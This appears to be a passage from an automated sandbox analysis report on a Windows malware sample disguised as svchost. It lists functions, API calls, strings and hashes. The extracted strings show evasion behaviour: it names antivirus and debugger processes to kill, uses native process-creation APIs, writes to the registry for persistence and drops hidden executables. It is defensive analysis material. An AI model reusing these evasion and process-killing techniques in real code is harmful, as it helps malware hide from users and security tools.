                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$AddressDirectoryProc$BlockCreateCurrentEnvironmentLoadSystemwcsnlen
                                                                                        • String ID: Diamotrixed!$NtCurrentPeb$RtlCreateProcessParametersEx$ntdll.dll
                                                                                        • API String ID: 4291753643-2287811734
                                                                                        • Opcode ID: 16a03e98275a15fa7fbf00527d921ee2a87b4c912d7ee25d9fcad31013e44fa4
                                                                                        • Instruction ID: 2e5c4a129e8a3ed2b109ece81d955cb6e6c72b36ab0d5585264a439d28fdb434
                                                                                        • Opcode Fuzzy Hash: 16a03e98275a15fa7fbf00527d921ee2a87b4c912d7ee25d9fcad31013e44fa4
                                                                                        • Instruction Fuzzy Hash: 61912B32618BC591EB60DB15E4443AAB3A1FB88B81F508536C68EC3B79EF7CD549CB00
                                                                                        Function 00007FF60BF81478 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 81libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: NtCreateProcessEx$NtCreateThreadEx$NtQueryInformationFile$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$RtlCreateProcessParametersEx$ntdll.dll
                                                                                        • API String ID: 2574300362-3070941563
                                                                                        • Opcode ID: fe0edb3ea2ea9d1b61de22b004e242eb16fd45174bdc196908c66df22b0c4eac
                                                                                        • Instruction ID: 3f26cdefcdfa18c4c1f8718bfdeabe4c6115e44fe9161e5a20c82156e13d1bfc
                                                                                        • Opcode Fuzzy Hash: fe0edb3ea2ea9d1b61de22b004e242eb16fd45174bdc196908c66df22b0c4eac
                                                                                        • Instruction Fuzzy Hash: 2741B12690DA8691EA709B05F54436A73A0FB8C788F209235D98FD7774DF7CE685CB00
                                                                                        Function 00007FF60BFA092C Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHeap$AllocCloseCreateHandleProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 4026551389-0
                                                                                        • Opcode ID: dad4417b183fee83f8e059b4764bb9658e6ee4e87390e1ce80ae04f4a6b01d07
                                                                                        • Instruction ID: 606d323f9063bb3fee5558d70ac8a6725293a8d6ceec9c9c8e9c571e60d589f4
                                                                                        • Opcode Fuzzy Hash: dad4417b183fee83f8e059b4764bb9658e6ee4e87390e1ce80ae04f4a6b01d07
                                                                                        • Instruction Fuzzy Hash: B281D772608B8182DB54CB55F49436AB7A0FBC9B95F208535EA8EC3B68DF7DD494CB00
                                                                                        Function 00007FF60BF9CEB8 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID: 360sd.exe$360ts.exe$AvastAntivirus.exe$AvastSvc.exe$AvastUI.exe$MsMpEng.exe$avgnext.exe$avgui.exe$avgwdsvc.exe
                                                                                        • API String ID: 2962429428-2792874574
                                                                                        • Opcode ID: 4ea5b1be55232d26d753203b733671219c7c2ad8b1cc2637dc4e508cc27a149c
                                                                                        • Instruction ID: 11394496b7e52890b7b8ee9fbd120faddd4e3cb1cb1d67fe0b8ecd5712a12332
                                                                                        • Opcode Fuzzy Hash: 4ea5b1be55232d26d753203b733671219c7c2ad8b1cc2637dc4e508cc27a149c
                                                                                        • Instruction Fuzzy Hash: E8516151A0CA4344FB209B29E85137AA794EF88398F748231E59FC75FAEF6DD605CB10
                                                                                        Function 00007FF60BF8DF2C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Yarn$Exceptionstd::_$FileHeaderLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow_lockstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                        • String ID: bad locale name
                                                                                        • API String ID: 3938507140-1405518554
                                                                                        • Opcode ID: ad999236b8d4008b2380ea14d0df8985624ecf54030ce66e7ee12e07fe8f9879
                                                                                        • Instruction ID: 66d28ac496e6974d316b0e6c4d9cdbaea513fd0289cf752b2f016ab176f86e11
                                                                                        • Opcode Fuzzy Hash: ad999236b8d4008b2380ea14d0df8985624ecf54030ce66e7ee12e07fe8f9879
                                                                                        • Instruction Fuzzy Hash: 0C111255F0878641DD04E796F85116DA360FFC9B94F908035E94EC77B6EEECD0158704
                                                                                        Function 00007FF60BF9B728 Relevance: 18.2, APIs: 12, Instructions: 244COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: char_traits$Mtx_guardMtx_guard::~_
                                                                                        • String ID:
                                                                                        • API String ID: 3950283302-0
                                                                                        • Opcode ID: 26e523eaab64f351134ad44a1117f834685a3f9a05b7fda99f5919bc6b6d8d46
                                                                                        • Instruction ID: 1c0de2b78db43567297fa278eac4cd8acc55c133149cc1d2b787970e3f45b327
                                                                                        • Opcode Fuzzy Hash: 26e523eaab64f351134ad44a1117f834685a3f9a05b7fda99f5919bc6b6d8d46
                                                                                        • Instruction Fuzzy Hash: A6D19866A1DBC181DA70DB56F4953AEB361FBC8784F108136DA8ED3B6ADF6CD0448B01
                                                                                        Function 00007FF60BF9DC08 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 62stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Templstrcpy$ExecuteFileNamePathShell
                                                                                        • String ID: .exe$@$open$p$tmp
                                                                                        • API String ID: 3481378980-1541851258
                                                                                        • Opcode ID: 5c69159e7257d6518b28d152e0a484615bf9003ab4f5bea52d68b51e3ab49161
                                                                                        • Instruction ID: 8f87452720e59456c524895d1bdfb039dc5b4a7686c05ac15279be74fb34e50a
                                                                                        • Opcode Fuzzy Hash: 5c69159e7257d6518b28d152e0a484615bf9003ab4f5bea52d68b51e3ab49161
                                                                                        • Instruction Fuzzy Hash: 57311036618B8595E760CF14F4847AAB7A4FB88794FA04235D69EC3AB8DF7CD544CB00
                                                                                        Function 00007FF60BF9DD68 Relevance: 16.6, APIs: 11, Instructions: 118stringfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filestrtok$lstrcmplstrlen$AttributesCopyDelete_getptdlstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3928754753-0
                                                                                        • Opcode ID: 69ab1e02483d50d6a6ebcaefcdd74d7f8472b56b7eb2f8c7d3e698012a23ad34
                                                                                        • Instruction ID: f08b0b5c45021c8542c8bfab6ca035c63918a1188737295efdf708bd685a9ec0
                                                                                        • Opcode Fuzzy Hash: 69ab1e02483d50d6a6ebcaefcdd74d7f8472b56b7eb2f8c7d3e698012a23ad34
                                                                                        • Instruction Fuzzy Hash: 83511026A1CA8591DB60DB15E45437EA3A4FBCCB48F608135E68EC7AA9DF3CD545CB00
                                                                                        Function 00007FF60BFA001C Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60BFA10A0: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA0057), ref: 00007FF60BFA10E8
                                                                                          • Part of subcall function 00007FF60BFA10A0: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA0057), ref: 00007FF60BFA1125
                                                                                          • Part of subcall function 00007FF60BFA10A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA0057), ref: 00007FF60BFA1130
                                                                                          • Part of subcall function 00007FF60BFA02E0: RegOpenKeyExW.ADVAPI32 ref: 00007FF60BFA0323
                                                                                          • Part of subcall function 00007FF60BFA02E0: RegSetValueExW.ADVAPI32 ref: 00007FF60BFA0359
                                                                                          • Part of subcall function 00007FF60BFA02E0: RegCloseKey.ADVAPI32 ref: 00007FF60BFA0368
                                                                                          • Part of subcall function 00007FF60BFA0C08: RegDeleteKeyW.ADVAPI32 ref: 00007FF60BFA0C20
                                                                                          • Part of subcall function 00007FF60BFA0E78: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF60BFA0E8B
                                                                                          • Part of subcall function 00007FF60BFA0E78: Process32FirstW.KERNEL32 ref: 00007FF60BFA0EB5
                                                                                          • Part of subcall function 00007FF60BFA0E78: CloseHandle.KERNEL32 ref: 00007FF60BFA0EC4
                                                                                          • Part of subcall function 00007FF60BFA0E78: wcscmp.MSVCRT ref: 00007FF60BFA0ED9
                                                                                          • Part of subcall function 00007FF60BFA0E78: OpenProcess.KERNEL32 ref: 00007FF60BFA0EEF
                                                                                          • Part of subcall function 00007FF60BFA0E78: TerminateProcess.KERNEL32 ref: 00007FF60BFA0F09
                                                                                          • Part of subcall function 00007FF60BFA0E78: CloseHandle.KERNEL32 ref: 00007FF60BFA0F14
                                                                                          • Part of subcall function 00007FF60BFA0E78: Process32NextW.KERNEL32 ref: 00007FF60BFA0F24
                                                                                          • Part of subcall function 00007FF60BFA0E78: CloseHandle.KERNEL32 ref: 00007FF60BFA0F33
                                                                                          • Part of subcall function 00007FF60BFA0F48: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00007FF60BFA0830), ref: 00007FF60BFA0F77
                                                                                        • Sleep.KERNEL32 ref: 00007FF60BFA0106
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                        • API String ID: 2853470409-928700279
                                                                                        • Opcode ID: fe3a8ccc8966489c9bf42d5c7acf8396356c702022448553b11e78d999c2d4d6
                                                                                        • Instruction ID: 5eeac992e0baeb11d915cf1cb9e7e414729e82f9973d5e1d09e7ecc0eeb781da
                                                                                        • Opcode Fuzzy Hash: fe3a8ccc8966489c9bf42d5c7acf8396356c702022448553b11e78d999c2d4d6
                                                                                        • Instruction Fuzzy Hash: 382180A1E5C542A0FA84EB20E9915B92760AF6C350FB0C931E51FD31F6DE7CE54ADB40
                                                                                        Function 00007FF60BFA0844 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60BFA1174: GetWindowsDirectoryW.KERNEL32 ref: 00007FF60BFA11AB
                                                                                          • Part of subcall function 00007FF60BFA1174: GetVolumeInformationW.KERNEL32 ref: 00007FF60BFA124C
                                                                                          • Part of subcall function 00007FF60BFA1174: wsprintfW.USER32 ref: 00007FF60BFA12DB
                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA088D
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08A2
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08B5
                                                                                        • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08C5
                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08D8
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08ED
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA0900
                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA0915
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                        • String ID: .exe
                                                                                        • API String ID: 1846285901-4119554291
                                                                                        • Opcode ID: ca690622e8857ab72fdfef2eeac93b212aec148aeea99314529bf70ea303a71a
                                                                                        • Instruction ID: 23dbeb656a340250a4f67c5465536810cfe3182ce979111e956f70576d35b8b9
                                                                                        • Opcode Fuzzy Hash: ca690622e8857ab72fdfef2eeac93b212aec148aeea99314529bf70ea303a71a
                                                                                        • Instruction Fuzzy Hash: 3B11212162CA8695DB609B25F95476AA321FBC8B81F50D432DA4FC3B39DE3CD559CB00
                                                                                        Function 00007FF60BFA0C44 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60BFA0D0C: GetWindowsDirectoryA.KERNEL32 ref: 00007FF60BFA0D41
                                                                                          • Part of subcall function 00007FF60BFA0D0C: GetVolumeInformationA.KERNEL32 ref: 00007FF60BFA0DCF
                                                                                          • Part of subcall function 00007FF60BFA0D0C: wsprintfA.USER32 ref: 00007FF60BFA0E5E
                                                                                        • SHGetFolderPathA.SHELL32(?,?,?,?,?,?,?,?,?,00007FF60BF9DE7D), ref: 00007FF60BFA0C85
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60BF9DE7D), ref: 00007FF60BFA0C97
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60BF9DE7D), ref: 00007FF60BFA0CA7
                                                                                        • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60BF9DE7D), ref: 00007FF60BFA0CB4
                                                                                        • SetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60BF9DE7D), ref: 00007FF60BFA0CC4
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60BF9DE7D), ref: 00007FF60BFA0CD6
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60BF9DE7D), ref: 00007FF60BFA0CE6
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF60BF9DE7D), ref: 00007FF60BFA0CF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                        • String ID: .exe
                                                                                        • API String ID: 1846285901-4119554291
                                                                                        • Opcode ID: 1e0782898900f0c9169d678093e814d4bf1776dfe6d0791ba9bb1146b86bc58f
                                                                                        • Instruction ID: 94da9c7abb5f950d188e5fcda1be2e2e60922a9392fa44a5f72b5a88124a6497
                                                                                        • Opcode Fuzzy Hash: 1e0782898900f0c9169d678093e814d4bf1776dfe6d0791ba9bb1146b86bc58f
                                                                                        • Instruction Fuzzy Hash: 8B11F421A2C946A7DB409F25F95456A7361FBC8754F609432EB4FC3639DE7CD44ACB00
                                                                                        Function 00007FF60BF9FE30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                        • String ID: rbNSpGEsyb
                                                                                        • API String ID: 299056699-189039185
                                                                                        • Opcode ID: 46ba0cd2de08216aef1d8b73fc81ba437baef2bc7f4b68b9de387672fb1d2dc8
                                                                                        • Instruction ID: 32d7417bbb660bbd04e2f926709f2d0e212f9f75eb26ee7b837c2fffcd7bb8bd
                                                                                        • Opcode Fuzzy Hash: 46ba0cd2de08216aef1d8b73fc81ba437baef2bc7f4b68b9de387672fb1d2dc8
                                                                                        • Instruction Fuzzy Hash: E101792691CA4292E730AF11E9942296360FBCCB55F608936E98FC3774CF7CE594C610
                                                                                        Function 00007FF60BF85B38 Relevance: 15.5, APIs: 1, Strings: 9, Instructions: 475sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60BF8D8F4: shared_ptr.LIBCPMTD ref: 00007FF60BF8D926
                                                                                          • Part of subcall function 00007FF60BF8D7D0: UnDecorator::getVbTableType.LIBCMTD ref: 00007FF60BF8D7FF
                                                                                          • Part of subcall function 00007FF60BF85A5C: Concurrency::details::VirtualProcessorRoot::GetSchedulerProxy.LIBCMTD ref: 00007FF60BF85A9D
                                                                                          • Part of subcall function 00007FF60BF83920: shared_ptr.LIBCPMTD ref: 00007FF60BF83940
                                                                                          • Part of subcall function 00007FF60BF859B8: GlobalAlloc.KERNEL32 ref: 00007FF60BF859DF
                                                                                          • Part of subcall function 00007FF60BF859B8: GlobalLock.KERNEL32 ref: 00007FF60BF859FE
                                                                                          • Part of subcall function 00007FF60BF859B8: GlobalUnlock.KERNEL32 ref: 00007FF60BF85A1B
                                                                                        • Sleep.KERNEL32 ref: 00007FF60BF866A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$shared_ptr$AllocConcurrency::details::Decorator::getLockProcessorProxyRoot::SchedulerSleepTableTypeUnlockVirtual
